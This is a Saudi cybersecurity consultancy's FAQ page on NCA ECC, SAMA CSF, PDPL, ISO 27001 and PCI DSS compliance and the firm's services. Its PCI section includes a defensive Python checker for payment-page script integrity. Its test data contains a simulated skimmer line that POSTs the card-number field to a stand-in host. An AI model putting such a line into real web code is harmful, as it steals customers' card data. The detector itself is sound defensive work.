🇸🇦 Kingdom of Saudi Arabia 📞 +966 549983377 ✉ contact@pristinesaudi.com
Frequently Asked Questions · Cybersecurity & Compliance · Saudi Arabia

Questions Answered. Clearly.

Answers to the most common questions about Saudi cybersecurity regulations, our services, compliance frameworks, and how to work with Pristine. Can't find what you need? Contact our team directly.

Saudi Compliance Regulations
Saudi organisations face multiple cybersecurity regulatory obligations depending on their sector and ownership: (1) NCA ECC-2:2024 — mandatory for all government entities, CNI operators, and NCA-regulated organisations; covers 4 domains and 110 controls. (2) SAMA CSF — mandatory for all SAMA-licensed financial institutions including banks, fintechs, insurance, and payment service providers. (3) Saudi PDPL — mandatory for all organisations collecting or processing Saudi personal data, regardless of location. (4) PCI DSS — mandatory for organisations accepting credit card or Mada payments. (5) NCA CCC — mandatory for organisations using cloud services alongside NCA ECC. Most Saudi organisations must comply with several simultaneously — Pristine delivers them all from an integrated programme.
Yes — NCA ECC-2:2024 (published October 2024) introduced significant changes from ECC-1:2018: (1) Restructured from 5 to 4 domains with new subdomain organisation; (2) New Saudi-national staffing requirement — all cybersecurity roles must be filled by Saudi nationals; (3) New sub-controls for AI cybersecurity, IoT security, and enhanced cloud security; (4) Updated incident response timeline requirements; (5) Expanded third-party risk management requirements. The transition deadline has passed — organisations still operating on ECC-1 controls are non-compliant. Pristine has ECC-2:2024 methodology and Arabic policy libraries ready for immediate deployment.
No — SAMA CSF and NCA ECC are separate mandatory obligations that both apply to SAMA-supervised financial institutions. They are not alternatives. SAMA CSF governs financial sector cybersecurity and is enforced by the Saudi Central Bank. NCA ECC governs national cybersecurity and is enforced by the National Cybersecurity Authority. The two frameworks have significant overlap (60-70% of controls are shared), which is why Pristine delivers them from a single integrated programme — satisfying both frameworks with shared evidence, dramatically reducing cost and effort compared to separate compliance projects.
Saudi PDPL has extraterritorial scope — it applies to any organisation that collects or processes personal data about individuals residing in Saudi Arabia, regardless of where that organisation is based. This means: international e-commerce platforms selling to Saudi customers; multinational corporations with Saudi employees; foreign organisations providing services to Saudi residents; and Saudi subsidiaries of international groups. If your organisation processes data about Saudi residents in any context, PDPL applies. Pristine advises on the specific obligations for your processing activities during the initial free assessment.
NCA enforcement actions for non-compliance include: formal findings requiring mandatory remediation within defined timelines; increased supervisory scrutiny and more frequent audits; financial penalties for persistent non-compliance; operational restrictions affecting eligibility for government contracts and licences; and in serious cases, escalation to criminal prosecution. For SAMA-supervised financial institutions, SAMA enforcement adds further consequences including examination adverse findings, product launch restrictions, and licence implications. If you have received NCA or SAMA findings, Pristine specialises in rapid post-audit remediation — contact us urgently.
Pristine's Security Services
SOC monitoring is a detection and response capability — Pristine's Riyadh-based analysts monitor your existing security tooling 24/7 for threats and incidents. MSSP (Managed Security Services Provider) is broader — it includes deploying, managing, and operating all your security technology (EDR, firewall, email security, WAF, vulnerability management) plus the SOC monitoring layer. MSSP clients automatically include SOC monitoring. If you already have security technology deployed and just need monitoring, SOC monitoring is appropriate. If you need a comprehensive outsourced security function including technology management, MSSP is more suitable.
For emergency incidents, call our 24/7 hotline at +966 549983377 — an IR Commander is engaged within 15 minutes. Remote triage and containment begins immediately. For retainer clients with pre-approved access, on-site deployment in Riyadh is guaranteed within 2 hours. For non-retainer emergency engagements, on-site deployment is typically 3-4 hours. GCC-wide (Dubai, Bahrain, Doha) on-site deployment is achievable within 8 hours. We recommend the IR Retainer programme for organisations in high-risk sectors — banking, energy, and government — to guarantee the fastest possible response.
Yes — Pristine's penetration testing practice covers IT, web application, cloud, mobile, API, and OT/ICS environments. Our IT and web application testing is conducted by OSCP, OSCE3, and CREST-certified ethical hackers. Our OT penetration testing uses exclusively passive, non-intrusive techniques — we never inject traffic or communicate with PLCs, DCS, or SCADA systems in production environments. Zero production impact is a contractual guarantee for all OT engagements. We have specific experience in Saudi energy, petrochemical, and industrial environments.
Pristine's SOC platform automatically collects and formats compliance evidence for all applicable frameworks throughout every client engagement: NCA ECC Domain 2 (Cybersecurity Defense) controls covering event logs and monitoring management, incident and threat management, and threat intelligence; SAMA CSF Domain 3 (Cybersecurity Operations and Technology) controls for security event management and incident management; ISO 27001 Clause 9 (Performance evaluation) monitoring and measurement evidence; and PCI DSS Requirement 10 (logging and monitoring) and Requirement 11 (security testing) evidence. Monthly compliance reports consolidate this evidence into pre-formatted NCA and SAMA submission packages, reducing annual audit preparation from months of manual effort to hours.
Yes — knowledge transfer is a core element of Pristine's engagement philosophy. We don't create dependency — we build your team's capability. Training is available as a standalone service through Pristine Training Academy (CISEH, CPTE, CCEI, ISO 27001, DPO programmes) and as integrated components of all major service engagements. All training is available in Arabic and English. We also run embedded Security Champions programmes for development teams, executive security awareness sessions for boards, and customised SOC analyst training for organisations building internal security capability.
NCA ECC Compliance
For organisations with a moderate compliance gap, Pristine targets full audit-ready NCA ECC-2:2024 compliance within 6-8 weeks. Organisations with minimal existing security controls may require 12-16 weeks. Our 2-week rapid gap assessment produces a precise timeline with a fixed delivery commitment before implementation begins. Emergency deliveries (2-4 weeks for organisations with imminent audit deadlines) are available. Pristine's proprietary NCA ECC methodology — built over 15 years of Saudi government engagement — is the fastest compliant delivery approach in the Saudi market.
NCA ECC-2:2024 requires that all defined cybersecurity roles within government entities and NCA-supervised organisations are filled by Saudi nationals. This applies to roles defined under the NCA cybersecurity career framework — CISO, cybersecurity managers, SOC analysts, and other designated security positions. This means organisations cannot use entirely foreign-national cybersecurity teams for compliance purposes. Pristine's government practice team is composed entirely of Saudi nationals — satisfying this requirement for all government engagements. For other organisations, Pristine advises on Saudisation planning as part of the compliance programme.
NCA ECC applies directly to all Saudi government entities, CNI operators, and their supply chains. For private sector organisations, applicability depends on their designation and regulatory relationships. Private sector organisations in regulated sectors (telecommunications, financial services, healthcare, energy) may have NCA ECC obligations through sector-specific regulatory requirements. Additionally, many private sector organisations that supply services to government entities face NCA ECC contractual requirements. Pristine conducts a regulatory scope assessment in the initial engagement to determine exactly which NCA requirements apply to your organisation.
Yes — NCA CCC (Cloud Cybersecurity Controls) is a separate NCA standard from NCA ECC, published for organisations using or providing cloud services in Saudi Arabia. CCC-2:2024 applies to Cloud Service Tenants (CSTs — organisations using cloud services) and Cloud Service Providers (CSPs — organisations offering cloud services). If your organisation uses cloud services and is subject to NCA ECC, you must also comply with NCA CCC. Pristine delivers both NCA ECC and NCA CCC from a single integrated programme — both standards share significant control overlap which our methodology satisfies simultaneously.
SAMA Cybersecurity Framework
SAMA CSF defines six maturity levels (0 to 5). Level 3 (Structured and Formalised) is the minimum SAMA expects of every supervised financial institution: controls are formally documented, approved and consistently implemented. Level 4 (Managed and Measurable) adds quantitative measurement, KPI tracking and periodic evaluation of control effectiveness; Saudi commercial banks were required to submit board-approved Level 4 roadmaps to SAMA. Anything below Level 3 constitutes non-compliance and will result in formal regulatory action during supervisory examination. Pristine delivers a Level 3 baseline for non-bank SAMA members and Level 4 for Saudi commercial banks in 12 weeks.
SAMA conducts supervisory examinations at a frequency determined by institution size, complexity, and risk profile. Larger commercial banks typically face annual examination. Smaller institutions and fintechs may be examined less frequently, but all institutions must submit annual self-assessments regardless of examination schedule. Pristine has prepared clients for SAMA examination with a 100% pass rate across all engagements.
SAMA enforcement actions for examination failures include: formal adverse findings requiring mandatory remediation within defined timelines; increased supervisory monitoring and more frequent examinations; restrictions on new product launches and business expansion pending remediation; financial penalties for persistent non-compliance; and in serious cases, restrictions on operating licences. If you have received adverse SAMA findings, contact Pristine immediately — we specialise in rapid post-examination remediation and have a 100% record of resolving all SAMA findings within regulatory timelines.
Saudi PDPL & Privacy
Saudi PDPL came into force on 14 September 2023, with a one-year transition period that ended on 14 September 2024. Since then SDAIA, the competent authority, has been enforcing the law, investigating complaints and conducting audits; there is no further grace period. If your organisation has not yet implemented a PDPL compliance programme, you are operating in breach of Saudi law and are exposed to fines of up to SAR 5 million per violation (which may be doubled for repeat violations), criminal penalties of up to two years' imprisonment for unlawfully disclosing or publishing sensitive personal data with intent to cause harm, and reputational damage from enforcement actions. Pristine recommends treating PDPL compliance as urgent; our Foundation programme can be deployed in 2 weeks.
PDPL implementing regulations require specific categories of organisations to designate a privacy officer (DPO equivalent) — including organisations processing large volumes of personal data, organisations processing sensitive personal data (health, financial, biometric), and organisations for which data processing is a core activity. Many Saudi businesses, banks, healthcare providers, and technology companies have DPO designation obligations. Pristine's PDPL gap assessment determines whether your organisation requires a DPO. For organisations that do, Pristine offers a Virtual DPO service — an experienced Saudi privacy professional serving as your DPO on a retained basis at a fraction of the cost of a full-time hire.
Saudi PDPL Article 29 and SDAIA's implementing regulations on data transfers restrict the transfer of personal data outside the Kingdom. Transfers are permitted only where: the destination country has been assessed by SDAIA as providing an adequate level of protection; appropriate safeguards are in place (standard contractual clauses, binding common rules within a corporate group, or an approved certification); or a specific exception under Article 29 applies (such as a transfer necessary to protect a data subject's vital interests). For international cloud services (AWS, Azure, GCP), Pristine maps which processing occurs in which region and implements the appropriate transfer mechanism. Saudi organisations using international group data centres or global SaaS platforms must specifically assess and document cross-border transfer compliance.
ISO 27001 & ISO 27701
For organisations with a moderate compliance gap, Pristine targets 20-24 weeks from gap assessment to certification award. Organisations with stronger existing controls can achieve certification in 14-16 weeks. Large or highly complex organisations may require 28-36 weeks. Pristine's proprietary ISO 27001 methodology has achieved a 99% first-attempt certification rate across all engagements. Adding ISO 27701 concurrently adds only 3-5 weeks compared to 12-18 weeks for sequential delivery — we recommend concurrent implementation for organisations with PDPL obligations.
Partially — ISO 27001 Annex A and NCA ECC-2:2024 sub-controls have approximately 80-85% overlap. Achieving ISO 27001 does not automatically satisfy NCA ECC — a formal NCA gap assessment against all 110 sub-controls is still required, and several NCA ECC requirements (Saudi-national staffing, NCA-specific incident notification procedures, Arabic policy requirements) have no ISO 27001 equivalent. However, Pristine maps every ISO 27001 Annex A control to NCA ECC sub-controls as a standard deliverable — meaning ISO implementation produces approximately 80-85% of NCA ECC evidence simultaneously. Pristine typically delivers ISO 27001 and NCA ECC from a single integrated programme.
PCI DSS
The SAQ type depends on how you accept card payments. For e-commerce: SAQ A applies to merchants who fully outsource all account data handling to PCI DSS compliant third-party service providers, so that every element of the payment page delivered to the customer's browser comes from the provider (a full redirect or a provider-hosted iframe) and your systems never touch card data. SAQ A-EP applies to merchants whose website does not itself receive account data but controls how customers or their account data are redirected to the payment provider, for example a merchant-hosted checkout that loads the provider's JavaScript. SAQ D applies to merchants who do not qualify for any other SAQ and to all SAQ-eligible service providers (card-present merchants have further types such as SAQ B, B-IP, C, C-VT and P2PE). Many Saudi e-commerce platforms self-assess as SAQ D when a fully outsourced integration would qualify them for SAQ A, carrying years of unnecessary compliance cost. Pristine's free PCI scoping call determines the correct assessment type for your specific payment integration.
PCI DSS v4.0 replaced v3.2.1, which was retired on 31 March 2024; its future-dated requirements became mandatory on 31 March 2025, and v4.0.1 is the current edition. Significant new requirements include: (1) Payment-page script management (Req 6.4.3), paired with change and tamper detection for payment pages (Req 11.6.1). Every script loaded into the customer's browser on a payment page must be inventoried with a written justification, authorised, and integrity-protected (for example with Subresource Integrity hashes or a Content Security Policy). These requirements target Magecart-style e-skimming, where a first- or third-party script on the checkout page is modified to exfiltrate card data; (2) Expanded MFA (Req 8.4.2), now required for all access into the CDE, not only for non-console administrative access and remote network access as under v3.2.1; (3) Targeted Risk Analysis (Req 12.3.1), which replaces fixed frequencies for several periodic activities with a documented, risk-based frequency; (4) Automated audit log review (Req 10.4.1.1), requiring automated mechanisms to perform log reviews. Organisations still operating to v3.2.1 controls are non-compliant.
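How the script-management requirement in (1) can be checked in practice, as an added example rather than Pristine's tooling or a PCI SSC artefact: the script below inventories every `<script>` on a checkout page, compares each external script's `integrity` attribute against an authorised inventory, and re-hashes what the browser would actually download. The page HTML, the inventory, the example.com hosts and the "fetched" script bodies are all constructed here so it runs offline; on a real engagement the page and scripts would be fetched from the live checkout URL on a schedule.

```python
"""Payment-page script inventory and integrity check, in the spirit of
PCI DSS v4.0 Req 6.4.3. Added example, not Pristine's tooling; the page,
the authorised inventory and the "fetched" bodies are constructed inline."""
import base64
import hashlib
from html.parser import HTMLParser

# Constructed authorised inventory (src -> approved body). Req 6.4.3 also
# wants a written justification per entry; omitted here for brevity.
AUTHORISED = {
    "https://cdn.example.com/checkout.js": b"window.checkout = function () { /* approved */ };",
    "https://psp.example.com/fields.js": b"window.pspFields = function () { /* approved */ };",
}
SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value for a script body, e.g. 'sha384-<base64>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI permits only {SRI_ALGOS}")
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode()}"


class _ScriptCollector(HTMLParser):
    """Collects every <script>: src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self._cur = {"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""}
            self.scripts.append(self._cur)

    def handle_data(self, data):
        if self._cur is not None and self._cur["src"] is None:
            self._cur["inline"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._cur = None


def inventory_scripts(html: str) -> list:
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts


def verify_payment_page(html: str, fetched: dict) -> dict:
    """Map each script (src, or 'inline#<n>') to a finding. 'ok' means the
    script is in the inventory, pinned with an integrity attribute that
    matches the authorised body, and the served body still matches it."""
    findings = {}
    for n, s in enumerate(inventory_scripts(html)):
        src, integrity = s["src"], s["integrity"]
        if src is None:  # SRI cannot pin inline code; needs hash CSP or review
            findings[f"inline#{n}"] = "inline-script-review-required"
        elif src not in AUTHORISED:
            findings[src] = "unauthorised-not-in-inventory"
        elif not integrity:
            findings[src] = "missing-integrity-attribute"
        elif integrity.split("-", 1)[0] not in SRI_ALGOS:
            findings[src] = "malformed-integrity-attribute"
        else:
            algo = integrity.split("-", 1)[0]
            expected = sri_hash(AUTHORISED[src], algo)
            if integrity != expected:
                findings[src] = "integrity-does-not-match-authorised-body"
            elif src not in fetched:
                findings[src] = "script-not-fetched"
            elif sri_hash(fetched[src], algo) != expected:
                findings[src] = "served-body-tampered"
            else:
                findings[src] = "ok"
    return findings


# Constructed checkout page: one correctly pinned script, one authorised but
# unpinned, one nobody authorised, and an inline handler on the PAN field.
PAYMENT_PAGE_HTML = f"""<html><body><form><input id="pan" name="pan"></form>
<script src="https://cdn.example.com/checkout.js"
        integrity="{sri_hash(AUTHORISED['https://cdn.example.com/checkout.js'])}"
        crossorigin="anonymous"></script>
<script src="https://psp.example.com/fields.js"></script>
<script src="https://stats.example.net/tag.js"></script>
<script>document.getElementById('pan').addEventListener('input', function () {{}});</script>
</body></html>"""

# Constructed: what the browser downloads today. checkout.js was modified
# upstream to POST the card number elsewhere, the classic skimmer pattern.
CDN_RESPONSES = {
    "https://cdn.example.com/checkout.js": AUTHORISED["https://cdn.example.com/checkout.js"]
    + b"\nfetch('https://collector.invalid/c', {method: 'POST', body: document.forms[0].pan.value});",
    "https://psp.example.com/fields.js": AUTHORISED["https://psp.example.com/fields.js"],
    "https://stats.example.net/tag.js": b"/* third-party analytics */",
}


def run_check() -> dict:
    return verify_payment_page(PAYMENT_PAGE_HTML, CDN_RESPONSES)


if __name__ == "__main__":
    for ident, finding in run_check().items():
        print(f"{finding:42} {ident}")
```

Run as a script it prints one line per script; the tampered checkout.js is reported as `served-body-tampered`, the PSP script as `missing-integrity-attribute`, the analytics tag as `unauthorised-not-in-inventory`, and the inline handler is surfaced for review. SRI only works for scripts whose content is fixed between releases; a provider script that changes without notice cannot be pinned this way and instead needs a CSP allowlist plus the provider's own change attestation, which is where Req 11.6.1's tamper detection on the served page fills the gap.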
Working With Pristine
Pristine engagements are scoped and fixed-priced before commencement — no open-ended billing or time-and-materials surprises. After the free initial assessment, Pristine proposes a defined scope of work with a fixed total cost, delivery timeline, and clear outcome commitments. For ongoing services (SOC monitoring, MSSP, compliance retainers), pricing is structured as monthly subscriptions with transparent per-user or per-asset pricing bands. Pristine never starts work before pricing is agreed. Contact us for indicative pricing — the free assessment often identifies scope reduction opportunities that significantly lower the cost of compliance or security services.
Pristine works fluently in both Arabic and English — clients can communicate, receive deliverables, and engage with our team entirely in Arabic if preferred. Our Arabic-native consultants write all compliance documentation, policies, and board presentations in Arabic as the primary language — not translations from English. This is a significant differentiator for Saudi government and regulatory engagements where Arabic-language documentation quality is evaluated by examiners. For international clients or engagements requiring English, all deliverables are provided in English. For most Saudi clients, we deliver bilingual Arabic and English packages simultaneously.
All Pristine engagements are conducted under formal NDA before any access to client systems, data, or documentation. Our penetration testing and security assessment teams operate under strict data handling procedures — all client data processed within Saudi Arabia, no cross-border transfer, and post-engagement data deletion procedures with written confirmation. For government and classified environment engagements, Pristine follows Saudi government information security classification procedures. Pristine is PDPL-compliant for all personal data processed during client engagements — including any personal data encountered during penetration testing or DFIR investigations.
Yes — Pristine can arrange reference conversations with existing clients across relevant sectors for qualified procurement enquiries. Due to the sensitivity of cybersecurity engagements, references are arranged through our client success team with prior client consent rather than published publicly. Contact our sales team with your reference request and sector of interest — we will arrange an appropriate reference introduction within 48 hours. Our case studies (with client identity anonymised) are publicly available and cover outcomes across government, banking, energy, healthcare, telecom, and retail sectors.
Pristine has no minimum contract size — we work with organisations ranging from 50-person SMEs to 10,000+ person enterprises and government ministries. Engagement duration varies by service type: compliance gap assessments can be completed in 2 weeks; full NCA ECC programmes typically run 8-12 weeks; SOC monitoring and MSSP contracts are structured as annual subscriptions with monthly rolling terms thereafter. For urgent incident response, there is no minimum engagement — we engage on an emergency basis for incidents of any scale. Contact us to discuss your specific requirements.

Still Have Questions?

Our team of Saudi cybersecurity specialists is available to answer any question — no matter how technical, regulatory-specific, or complex. No sales pressure, just genuine expert guidance.


Response within 4 business hours · Arabic and English · No obligation
